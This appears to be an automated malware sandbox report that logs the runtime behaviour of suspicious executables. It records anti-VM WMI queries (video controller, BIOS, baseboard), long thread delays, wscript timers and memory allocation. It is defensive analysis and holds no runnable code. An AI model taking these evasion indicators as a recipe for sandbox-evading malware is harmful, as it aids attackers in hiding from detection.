            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeMemory allocated: 1980000 memory reserve | memory write watchJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeMemory allocated: 1B440000 memory reserve | memory write watchJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: A80000 memory reserve | memory write watchJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1A760000 memory reserve | memory write watchJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: CB0000 memory reserve | memory write watchJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1AA50000 memory reserve | memory write watchJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1020000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1AE90000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: C70000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1AAD0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1160000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1AFF0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1470000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1AED0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: FD0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1AAE0000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1700000 memory reserve | memory write watch
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeMemory allocated: 1B400000 memory reserve | memory write watch
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599878Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599875
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599765
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599891
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599890
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599797
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWindow / User API: threadDelayed 588Jump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeWindow / User API: threadDelayed 1572Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 364Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 582Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 503Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 835
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 1325
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 967
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 961
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 863
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 524
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 1491
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 1503
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 661
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 1775
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWindow / User API: threadDelayed 495
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe TID: 7748Thread sleep count: 588 > 30Jump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe TID: 7740Thread sleep count: 1572 > 30Jump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe TID: 7716Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 6824Thread sleep count: 364 > 30Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1016Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4456Thread sleep count: 582 > 30Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3788Thread sleep count: 503 > 30Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3352Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3352Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3352Thread sleep time: -599878s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3492Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7356Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2148Thread sleep count: 835 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2240Thread sleep count: 191 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2188Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4180Thread sleep count: 1325 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4216Thread sleep count: 967 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096Thread sleep time: -599875s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5096Thread sleep time: -599765s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7644Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4144Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7184Thread sleep count: 961 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 8172Thread sleep count: 863 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5624Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5624Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4220Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 8136Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7664Thread sleep count: 524 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7632Thread sleep count: 1491 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212Thread sleep time: -599891s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1212Thread sleep time: -599781s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7044Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1820Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3628Thread sleep count: 1503 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7284Thread sleep count: 661 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944Thread sleep time: -599890s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 7944Thread sleep time: -599781s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1528Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 6840Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5712Thread sleep count: 1775 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 3972Thread sleep count: 495 > 30
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5420Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5420Thread sleep time: -600000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 5420Thread sleep time: -599797s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 2836Thread sleep time: -30000s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 4256Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe TID: 1780Thread sleep time: -922337203685477s >= -30000s
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeFile Volume queried: C:\ FullSizeInformation
